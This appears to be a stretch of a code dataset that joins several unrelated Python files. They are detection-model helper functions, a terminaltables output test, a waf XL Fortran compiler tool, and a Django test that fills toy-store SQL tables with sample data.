def dict_concat(dicts: List[Dict[str, list]]):
return {k: list_concat([d[k] for d in dicts]) for k in dicts[0].keys()}
def dict_fuse(obj_list, reference_obj):
if isinstance(reference_obj, torch.Tensor):
return torch.stack(obj_list)
return obj_list
def dict_select(dict1: Dict[str, list], key: str, value: str):
flag = [v == value for v in dict1[key]]
return {
k: dict_fuse([vv for vv, ff in zip(v, flag) if ff], v) for k, v in dict1.items()
}
def dict_split(dict1, key):
group_names = list(set(dict1[key]))
dict_groups = {k: dict_select(dict1, key, k) for k in group_names}
return dict_groups
def dict_sum(a, b):
if isinstance(a, dict):
assert isinstance(b, dict)
return {k: dict_sum(v, b[k]) for k, v in a.items()}
elif isinstance(a, list):
assert len(a) == len(b)
return [dict_sum(aa, bb) for aa, bb in zip(a, b)]
else:
return a + b
def zero_like(tensor_pack, prefix=""):
if isinstance(tensor_pack, Sequence):
return [zero_like(t) for t in tensor_pack]
elif isinstance(tensor_pack, Mapping):
return {prefix + k: zero_like(v) for k, v in tensor_pack.items()}
elif isinstance(tensor_pack, torch.Tensor):
return tensor_pack.new_zeros(tensor_pack.shape)
elif isinstance(tensor_pack, np.ndarray):
return np.zeros_like(tensor_pack)
else:
warnings.warn("Unexpected data type {}".format(type(tensor_pack)))
return 0
def pad_stack(tensors, shape, pad_value=255):
tensors = torch.stack(
[
F.pad(
tensor,
pad=[0, shape[1] - tensor.shape[1], 0, shape[0] - tensor.shape[0]],
value=pad_value,
)
for tensor in tensors
]
)
return tensors
def result2bbox(result):
num_class = len(result)
bbox = np.concatenate(result)
if bbox.shape[0] == 0:
label = np.zeros(0, dtype=np.uint8)
else:
label = np.concatenate(
[[i] * len(result[i]) for i in range(num_class) if len(result[i]) > 0]
).reshape((-1,))
return bbox, label
def result2mask(result):
num_class = len(result)
mask = [np.stack(result[i]) for i in range(num_class) if len(result[i]) > 0]
if len(mask) > 0:
mask = np.concatenate(mask)
else:
mask = np.zeros((0, 1, 1))
return BitmapMasks(mask, mask.shape[1], mask.shape[2]), None
def sequence_mul(obj, multiplier):
if isinstance(obj, Sequence):
return [o * multiplier for o in obj]
else:
return obj * multiplier
def is_match(word, word_list):
for keyword in word_list:
if keyword in word:
return True
return False
def weighted_loss(loss: dict, weight, ignore_keys=[], warmup=0):
_step_counter["weight"] += 1
lambda_weight = (
lambda x: x * (_step_counter["weight"] - 1) / warmup
if _step_counter["weight"] <= warmup
else x
)
if isinstance(weight, Mapping):
for k, v in weight.items():
for name, loss_item in loss.items():
if (k in name) and ("loss" in name):
loss[name] = sequence_mul(loss[name], lambda_weight(v))
elif isinstance(weight, Number):
for name, loss_item in loss.items():
if "loss" in name:
if not is_match(name, ignore_keys):
loss[name] = sequence_mul(loss[name], lambda_weight(weight))
else:
loss[name] = sequence_mul(loss[name], 0.0)
else:
raise NotImplementedError()
return loss
| 2.171875 | 2 |
tests/tabular_output/test_terminaltables_adapter.py | zzl0/cli_helpers | 0 | 5597 | # -*- coding: utf-8 -*-
"""Test the terminaltables output adapter."""
from __future__ import unicode_literals
from textwrap import dedent
import pytest
from cli_helpers.compat import HAS_PYGMENTS
from cli_helpers.tabular_output import terminaltables_adapter
if HAS_PYGMENTS:
from pygments.style import Style
from pygments.token import Token
def test_terminal_tables_adapter():
"""Test the terminaltables output adapter."""
data = [['abc', 1], ['d', 456]]
headers = ['letters', 'number']
output = terminaltables_adapter.adapter(
iter(data), headers, table_format='ascii')
assert "\n".join(output) == dedent('''\
+---------+--------+
| letters | number |
+---------+--------+
| abc | 1 |
| d | 456 |
+---------+--------+''')
@pytest.mark.skipif(not HAS_PYGMENTS, reason='requires the Pygments library')
def test_style_output_table():
"""Test that *style_output_table()* styles the output table."""
class CliStyle(Style):
default_style = ""
styles = {
Token.Output.TableSeparator: '#ansired',
}
headers = ['h1', 'h2']
data = [['观音', '2'], ['Ποσειδῶν', 'b']]
style_output_table = terminaltables_adapter.style_output_table('ascii')
style_output_table(data, headers, style=CliStyle)
output = terminaltables_adapter.adapter(iter(data), headers, table_format='ascii')
assert "\n".join(output) == dedent('''\
\x1b[31;01m+\x1b[39;00m''' + (
('\x1b[31;01m-\x1b[39;00m' * 10) +
'\x1b[31;01m+\x1b[39;00m' +
('\x1b[31;01m-\x1b[39;00m' * 4)) +
'''\x1b[31;01m+\x1b[39;00m
\x1b[31;01m|\x1b[39;00m h1 \x1b[31;01m|\x1b[39;00m''' +
''' h2 \x1b[31;01m|\x1b[39;00m
''' + '\x1b[31;01m+\x1b[39;00m' + (
('\x1b[31;01m-\x1b[39;00m' * 10) +
'\x1b[31;01m+\x1b[39;00m' +
('\x1b[31;01m-\x1b[39;00m' * 4)) +
'''\x1b[31;01m+\x1b[39;00m
\x1b[31;01m|\x1b[39;00m 观音 \x1b[31;01m|\x1b[39;00m''' +
''' 2 \x1b[31;01m|\x1b[39;00m
\x1b[31;01m|\x1b[39;00m Ποσειδῶν \x1b[31;01m|\x1b[39;00m''' +
''' b \x1b[31;01m|\x1b[39;00m
''' + '\x1b[31;01m+\x1b[39;00m' + (
('\x1b[31;01m-\x1b[39;00m' * 10) +
'\x1b[31;01m+\x1b[39;00m' +
('\x1b[31;01m-\x1b[39;00m' * 4)) +
'\x1b[31;01m+\x1b[39;00m')
| 2.5625 | 3 |
dev/Tools/build/waf-1.7.13/waflib/extras/fc_xlf.py | jeikabu/lumberyard | 1,738 | 5598 | <gh_stars>1000+
#! /usr/bin/env python
# encoding: utf-8
# harald at klimachs.de
import re
from waflib import Utils,Errors
from waflib.Tools import fc,fc_config,fc_scan
from waflib.Configure import conf
from waflib.Tools.compiler_fc import fc_compiler
fc_compiler['aix'].insert(0, 'fc_xlf')
@conf
def find_xlf(conf):
"""Find the xlf program (will look in the environment variable 'FC')"""
fc = conf.find_program(['xlf2003_r', 'xlf2003', 'xlf95_r', 'xlf95', 'xlf90_r', 'xlf90', 'xlf_r', 'xlf'], var='FC')
fc = conf.cmd_to_list(fc)
conf.get_xlf_version(fc)
conf.env.FC_NAME='XLF'
@conf
def xlf_flags(conf):
v = conf.env
v['FCDEFINES_ST'] = '-WF,-D%s'
v['FCFLAGS_fcshlib'] = ['-qpic=small']
v['FCFLAGS_DEBUG'] = ['-qhalt=w']
v['LINKFLAGS_fcshlib'] = ['-Wl,-shared']
@conf
def xlf_modifier_platform(conf):
dest_os = conf.env['DEST_OS'] or Utils.unversioned_sys_platform()
xlf_modifier_func = getattr(conf, 'xlf_modifier_' + dest_os, None)
if xlf_modifier_func:
xlf_modifier_func()
@conf
def get_xlf_version(conf, fc):
"""Get the compiler version"""
cmd = fc + ['-qversion']
try:
out, err = conf.cmd_and_log(cmd, output=0)
except Errors.WafError:
conf.fatal('Could not find xlf %r' % cmd)
for v in (r"IBM XL Fortran.* V(?P<major>\d*)\.(?P<minor>\d*)",):
version_re = re.compile(v, re.I).search
match = version_re(out or err)
if match:
k = match.groupdict()
conf.env['FC_VERSION'] = (k['major'], k['minor'])
break
else:
conf.fatal('Could not determine the XLF version.')
def configure(conf):
conf.find_xlf()
conf.find_ar()
conf.fc_flags()
conf.fc_add_flags()
conf.xlf_flags()
conf.xlf_modifier_platform()
| 1.96875 | 2 |
tutorials/create_table/tests.py | MeGustas-5427/SQL_Tutorials | 13 | 5599 | #!/usr/bin/python3
# -*- coding:utf-8 -*-
# __author__ = '__MeGustas__'
from django.test import TestCase
from django.db import connection
from tutorials.create_table.models import *
# Create your tests here.
class TestHealthFile(TestCase):
def setUp(self):
cursor = connection.cursor()
# Populate Customers table
cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact, cust_email) \
VALUES('1000000001', 'Village Toys', '200 Maple Lane', 'Detroit', 'MI', '44444', 'USA', '<NAME>', '<EMAIL>');")
cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact) \
VALUES('1000000002', 'Kids Place', '333 South Lake Drive', 'Columbus', 'OH', '43333', 'USA', 'Michelle Green');")
cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact, cust_email) \
VALUES('1000000003', 'Fun4All', '1 Sunny Place', 'Muncie', 'IN', '42222', 'USA', '<NAME>', '<EMAIL>');")
cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact, cust_email) \
VALUES('1000000004', 'Fun4All', '829 Riverside Drive', 'Phoenix', 'AZ', '88888', 'USA', '<NAME>', '<EMAIL>');")
cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact) \
VALUES('1000000005', 'The Toy Store', '4545 53rd Street', 'Chicago', 'IL', '54545', 'USA', '<NAME>');")
# Populate Vendors table
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('BRS01','Bears R Us','123 Main Street','Bear Town','MI','44444', 'USA');")
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('BRE02','Bear Emporium','500 Park Street','Anytown','OH','44333', 'USA');")
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('DLL01','Doll House Inc.','555 High Street','Dollsville','CA','99999', 'USA');")
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('FRB01','Furball Inc.','1000 5th Avenue','New York','NY','11111', 'USA');")
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('FNG01','Fun and Games','42 Galaxy Road','London', NULL,'N16 6PS', 'England');")
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('JTS01','Jouets et ours','1 Rue Amusement','Paris', NULL,'45678', 'France');")
# Populate Products table
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BR01', 'BRS01', '8 inch teddy bear', 5.99, '8 inch teddy bear, comes with cap and jacket');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BR02', 'BRS01', '12 inch teddy bear', 8.99, '12 inch teddy bear, comes with cap and jacket');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BR03', 'BRS01', '18 inch teddy bear', 11.99, '18 inch teddy bear, comes with cap and jacket');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BNBG01', 'DLL01', 'Fish bean bag toy', 3.49, 'Fish bean bag toy, complete with bean bag worms with which to feed it');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BNBG02', 'DLL01', 'Bird bean bag toy', 3.49, 'Bird bean bag toy, eggs are not included');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('BNBG03', 'DLL01', 'Rabbit bean bag toy', 3.49, 'Rabbit bean bag toy, comes with bean bag carrots');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('RGAN01', 'DLL01', 'Raggedy Ann', 4.99, '18 inch Raggedy Ann doll');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('RYL01', 'FNG01', 'King doll', 9.49, '12 inch king doll with royal garments and crown');")
cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \
VALUES('RYL02', 'FNG01', 'Queen doll', 9.49, '12 inch queen doll with royal garments and crown');")
# Populate Orders table
cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \
VALUES(20005, '2020-05-01', '1000000001');")
cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \
VALUES(20006, '2020-01-12', '1000000003');")
cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \
VALUES(20007, '2020-01-30', '1000000004');")
cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \
VALUES(20008, '2020-02-03', '1000000005');")
cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \
VALUES(20009, '2020-02-08', '1000000001');")
# Populate OrderItems table
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20005, 1, 'BR01', 100, 5.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20005, 2, 'BR03', 100, 10.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20006, 1, 'BR01', 20, 5.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20006, 2, 'BR02', 10, 8.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20006, 3, 'BR03', 10, 11.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20007, 1, 'BR03', 50, 11.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20007, 2, 'BNBG01', 100, 2.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20007, 3, 'BNBG02', 100, 2.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20007, 4, 'BNBG03', 100, 2.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20007, 5, 'RGAN01', 50, 4.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20008, 1, 'RGAN01', 5, 4.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20008, 2, 'BR03', 5, 11.99);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20008, 3, 'BNBG01', 10, 3.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20008, 4, 'BNBG02', 10, 3.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20008, 5, 'BNBG03', 10, 3.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20009, 1, 'BNBG01', 250, 2.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20009, 2, 'BNBG02', 250, 2.49);")
cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \
VALUES(20009, 3, 'BNBG03', 250, 2.49);")
def tearDown(self):
# Clean up run after every test method.
Customers.objects.all().delete()
Vendors.objects.all().delete()
Orders.objects.all().delete()
OrderItems.objects.all().delete()
Products.objects.all().delete()
def test_customers(self):
for i in Customers.objects.all():
print(i.to_dict())
for i in Vendors.objects.all():
print(i.to_dict())
for i in Orders.objects.all():
print(i.to_dict())
for i in OrderItems.objects.all():
print(i.to_dict())
for i in Products.objects.all():
print(i.to_dict()) | 2.4375 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.